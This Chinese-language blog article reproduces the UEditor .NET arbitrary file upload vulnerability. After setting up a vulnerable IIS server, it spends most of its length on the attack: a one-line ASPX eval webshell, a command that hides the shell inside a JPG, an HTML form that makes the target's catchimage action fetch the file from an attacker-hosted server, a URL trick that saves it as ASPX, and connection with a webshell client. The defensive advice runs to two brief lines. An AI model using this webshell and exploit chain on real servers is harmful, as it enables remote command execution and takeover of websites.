一、漏洞描述

UEditor是一款所見即所得的開源富文本編輯器，具有輕量、可定制、用戶體驗優(yōu)秀等特點，被廣大WEB應(yīng)用程序所使用。本次爆出的高危漏洞屬于.NET版本，其它的版本暫時不受影響。漏洞成因是在抓取遠程數(shù)據(jù)源的時候未對文件后綴名做驗證導(dǎo)致任意文件寫入漏洞，黑客利用此漏洞可以在服務(wù)器上執(zhí)行任意指令，綜合評級高危。

二、影響范圍

該漏洞影響UEditor的.Net版本，其它語言版本暫時未受影響。

三、漏洞原理

漏洞的成因是在獲取圖片資源時僅檢查了Content-Type，導(dǎo)致可以繞過達到任意文件上傳。具體的漏洞分析可參考：https://www.freebuf.com/vuls/181814.html

四、漏洞復(fù)現(xiàn)

1、環(huán)境部署

準(zhǔn)備一臺Windows Server服務(wù)器，我用的是Windows 2008 Server。

沒有安裝.NET Framework 4.0的要先安裝：http://www.microsoft.com/zh-cn/download/details.aspx?id=17718

安裝完 .NET Framework 4.0 后，還需要向 IIS 注冊應(yīng)用程序池，注冊的方法是，使用管理員權(quán)限打開命令提示符（CMD），輸入以下命令：

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis -i

安裝完畢后，在 IIS 管理器刷新就能看到 4.0 的應(yīng)用程序池。

https://github.com/fex-team/ueditor/releases/tag/v1.4.3.3 下載utf8的.net版本

右鍵 網(wǎng)站–添加網(wǎng)站，選擇下載的Ueditor目錄， 選擇版本為 4.0 的應(yīng)用程序池；點擊連接為，設(shè)置特定用戶，該特定用戶為主機上存在的用戶例如administrator

此時訪問127.0.0.1:8080已經(jīng)有Ueditor的界面了

代碼要求以應(yīng)用程序的形式來運行（可以方便加入庫依賴和組織代碼）。所以需要把 net 目錄轉(zhuǎn)換為應(yīng)用程序；點擊連接為，設(shè)置特定用戶，該特定用戶為主機上存在的用戶例如administrator

訪問net/controller.ashx 控制器文件，出現(xiàn)以下界面說明編輯器應(yīng)用程序運行成功，且漏洞存在，到此配置完畢。

如果配置過程中訪問頁面顯示權(quán)限不夠的報錯，那么右鍵部署項目的文件夾，選擇屬性，選擇安全，增加Everyone用戶，將該用戶的權(quán)限設(shè)置為完全控制，點擊確定，重新部署即可。

2、攻擊流程

訪問http://ip:port/net/controller.ashx 控制器文件。當(dāng)出現(xiàn)下圖的時候表示漏洞存在

準(zhǔn)備一個aspx一句話木馬

<% @Page Language="Jscript"%><%eval(Request.Item["w01ke"],"unsafe");%>

制作圖片馬

copy w01ke.jpg /b + shell.aspx /a ueditor.jpg

準(zhǔn)備一臺服務(wù)器存放圖片馬或者需要上傳的文件，將做好的ueditor.jpg圖片馬上傳到我們的服務(wù)器，并開啟下載服務(wù)（HTTP）

python -m SimpleHTTPServer 8080

制作一個HTML。因為不是上傳漏洞所以enctype 不需要指定為multipart/form-data。

<form action="http://xxxxx/controller.ashx?action=catchimage" enctype="application/x-www-form-urlencoded"  method="POST">
  <p>shell addr: <input type="text" name="source[]" /></p >
  <input type="submit" value="Submit" />
</form>

其中http://xx.com 為需要測試的網(wǎng)站地址，action后填寫路徑為實際中遇到的路徑，不要太死板，如果太死板不按網(wǎng)站的實際路徑來就會出現(xiàn)路徑找不到的錯誤

打開我們做好的HTML，shell addr 處填寫服務(wù)器上圖片馬地址，構(gòu)造成以下格式，繞過上傳使其解析為 aspx

http://xxxx/ueditor.jpg?.aspx

點擊submit，直接顯示無效URL

經(jīng)過排查，發(fā)現(xiàn)不能用Python開啟web的方式，貌似只能用域名的形式（我不確定），我只好把我的圖片馬上傳至云服務(wù)器，然后修改訪問域名即可成功，同時回顯了木馬路徑

使用蟻劍連接：

文章來源地址http://www.zghlxwxcb.cn/news/detail-810980.html

五、防御措施

1. 修改CrawlerHandler.cs 增加對文件擴展名的；
2. IPS等防御產(chǎn)品可以加入相應(yīng)的特征

到了這里，關(guān)于Ueditor編輯器任意文件上傳漏洞的文章就介紹完了。如果您還想了解更多內(nèi)容，請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章，希望大家以后多多支持TOY模板網(wǎng)！